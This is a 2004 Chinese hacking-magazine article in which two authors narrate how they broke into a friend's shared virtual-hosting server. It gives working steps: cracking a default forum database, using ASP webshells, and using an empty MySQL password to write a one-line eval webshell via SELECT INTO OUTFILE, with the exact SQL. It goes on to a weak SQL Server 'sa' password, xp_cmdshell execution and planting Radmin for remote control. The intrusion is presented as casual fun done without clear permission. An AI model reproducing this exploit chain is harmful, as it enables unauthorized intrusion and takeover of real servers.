一次典型的虚拟主机入侵
本次入侵过程由空虚浪子心和网路游侠合作完成,文章也是两个人的角度写的,希望大家喜欢这种方式。^_^
网路游侠
学校一位朋友租用了一台服务器,做WEB服务器,大款啊……
某日,本人无所事事,于是准备看看朋友服务器的安全性如何。我知道他的服务器上除了自己公开的网站之外,还放了几个正在建设中的站点。
敲上一个他新买的域名地址,发现网站也是新做的,并且非常漂亮。于是就想down一个看看。当然程序我是有的,但是版本比较老,其实直接向朋友要也没有问题,但是本着 “自己动手,丰衣足食”的指导思想,再想想咱们“所谓Hacker”的精神,还是自己拿吧,顺便把这次的测试结果告诉朋友,也算是补偿。呵呵
首先下载桂林老兵的“虚拟主机站点查询工具”,看到主机上放着如下几个网站:
依次打开网站看有无漏洞,有如下总结:
1、两个新手从网上下载的整站程序没有修改默认用户名和密码admin,但是这两套程序的admin也只能添加文章、软件,没有更多的权限,无法利用。
2、主要的程序经过手工探测和NBSI v2的测试,确认没有SQL Injection漏洞,这样子就无法拿到一些帐号可以上传等的权限。
陷入僵局中。
空虚浪子心
网站以前曾经进去过,所以如果他没有修改服务器名称并且修改物理路径的话 ^_^ ——我现在知道站点的物理路径,以及他的机器名。既然上次进去过,也许有缘,就再来一次吧!
还是要刺探信息。网站论坛的目录是www.xxxxx.com/bbs,还有/bs,/bbs1,这两个是我事先知道的,因为他刚装了yuzi,怕不能正常运行,所以留下了一个动网/bbs1(已经打了补丁,后门也不在),/bs一直是站点维护并不使用着,看起来站长不打算用它。
先看看他的权限吧,随便找了个比较简单的站进去webshell,发现权限设置还比较严格,不能浏览其他盘.(什么?问我怎么进去的?是我疏忽——DVBBS 6数据库默认,下载之后暴力破解密码,然后在后台更改注册信息,随便写个东东进去——剩下不用我废话吧?)现在是要进一步通过这个webshell得到一些信息。推荐砍客联盟的asp木马,很牛的!(图二)这台计算机的进程表就出来了看看他都运行什么服务
gram Files/Symantec/pcAnywhere/awhost32.exe是pcanywhere的进程
gram Files/Symantec_Client_Security/Symantec AntiVirus/Rtvscan.exe这是Symantec AntiVirus杀毒软件
Serv-U--Serv-U FTP 服务器--2 gram Files/Serv-U/ServUDaemon.exe
SQLSERVERAGENT--SQLSERVERAGENT--3 OGRA~1/MICROS~1/MSSQL/binn/sqlagent.exe
W3SVC--World Wide Web Publishing Service--2 WINNT/System32/inetsrv/inetinfo.exe
MySql--MySql--2 mysql/bin/mysqld-nt.exe
别的信息没什么用,现在要想得到系统控制权,还是从MS SQL入手,x-scan扫描了一下,没有弱口令。陷入僵局,打算另找途径。
网路游侠
X-Scan的扫描结果非常要人郁闷——MySQL的口令是空哦!典型的默认安装!(后来我问管理服务器的朋友,他说有密码,看来他是把MySQL Admin的密码当成MySQL的密码了)。既然得到这些,就可以用牛族的SMysql-v1.7连接了。
郁闷,天不早了,准备睡觉,明天还要忙呢!
空虚浪子心
用牛族的东东,必须要得到web物理路径才行。这就有点麻烦,上次得到站点路径在d:/wwwroot/下,但是这次我又找的站点却在g:/user/*****下,这可不好分析了,那么我们要的站点到底在哪个目录下呢?那个站点只有一个bbs,站点域名是一排数字,仍然不敢断定站点路径。
又到处看着站点,翻了一段时间,突然在浏览它的站点时发现"感谢**网站提供托管主机服务!"这下,全明白了!这个站长,除了自己的站点之外,还把别人站放上去自己赚钱!那么d:/是他自己的站点,而g:/user/就是来找他要空间的站点了,也就是说可以确定,我要的东东就在g:/user/*****下(请注意,这个*****,可不代表上面的都一样),我再看一下得到的讯息,又提取出来这些。
我已经入侵的站点从webshell的讯息:
--------------------------------------------------------
机器名 ***R2MQGH 帐号 CUS_X*** WEB路径 G:/user/xi***/
用cmdshell得到用户(虽然不能添加,但是可以查看)
Administrator ASPNET CUS_***
CUS_**** CUS_***** CUS_**gi
CUS_changan CUS_cra** CUS_**hudie
CUS_fen** CUS_he** CUS_ima**
CUS_LB** CUS_lc** CUS_L**
CUS_Ltgm** CUS_mail Cus_p**
CUS_Qun** CUS_s** CUS_s**
CUS_us** CUS_Xi***
--------------------------------------------------------
可以推断:不管是哪一个站点,用户都是CUS_开头之后是他的申请时候用户名比如CUS_changan里面并没有数字的站(我要的程序就是数字域名),但是他的名称却是“长安***”,所以,这个CUS_changan 就是我要的!根据他的习惯G:/user/xi***/ ,推断我要得路径就是G:/user/changan/
既然得到路径,我就顺便把使用牛族的教程+牛族的SMysql-v1.7过程大略说一下:
----------------------------------------引用牛族教程附加修改
得到密码后,用牛族SuperMysql连接器 V1.7连上去,接着输入:
use mysql;
进入mysql这个数据库
create table shuangfeng(cmd TEXT)
选择在名叫mysql的库中建一个名叫shuangfeng的表,这个表只有一个字段名叫cmd,数据类型为TEXT
insert into shuangfeng values("<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>")
就是在shuangfeng的表里写入<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>
相信明眼人一看就知道,冰狐浪子,一句话,而且还不用过滤什么"号
select * from shuangfeng into outfile "g://user//changan//kxlzx.asp"
很明显,是把表中的内容输出到g:/user/changan/kxlzx.asp
-------------------------------------------引用结束
查看果然有了kxlzx.asp,成功!赶快用其他数据库连接器连接,把那个表删除。我就不抓图了。关键是后面。
现在已经差不多了!在告诉网路游侠的同时,我也上传了方便一点的木马。但是用webshell下载这东东不方便。的确,要想得到方便的传输,最好是放个radmin上去,或者开3389,因为3389动作太大,我还是想用radmin.这就要得到系统控制权,而上传文件可以用webshell,不是问题。要想用MySQL得到权限,我还没找到相应办法,不过既然拿到了这个webshell,可以利用的,前面已经说了,它MS SQL数据库。(图三)
找到了数据库连接文件Password=sa1;" & "Persist Security Info=True;User ID=sa
晕倒。。。这么弱的密码!我的扫描器还刚好没有!于是SqlExec连接(图4),连接成功。
利用webshell上传radmin服务端。然后移动到c:/winnt/system32下,执行。
再一看!端口4899打开!连接后找到了我说的g:/user/目录!(图5)
好的,这下入侵才算完毕了!
网路游侠PS
在入侵的的过程中,空虚浪子心发现了SQL Server密码之后,我在本地装了一个SQL Server,连接上了远程的SQL数据库,用查询分析器测试:
xp_cmdshell "dir c:/"”
显示初了C盘根目录下面的文件!呵呵,接下来可以用他执行一些命令了,别忘了,sa的权限可是system的哦!写木马、拷文件……都不在话下!
当然,这些以前的文章都写过了,不再多说了,要不土豆编辑就说我和空虚浪子心联合骗稿费了!呵呵
关于上面的文字:
发表于:2004年10月《黑客X档案》
版权:1、归发表该文的杂志社;2、归本文作者。
如承蒙转载请注明发表于该期杂志,以及作者姓名,谢谢合作!
作者:张百川 (网名:网路游侠)
主页:http://youxia.xijing.org
联系:zbc98@126.com和zbc98@sohu.com
OICQ:175589438和55984512 闲聊勿扰 J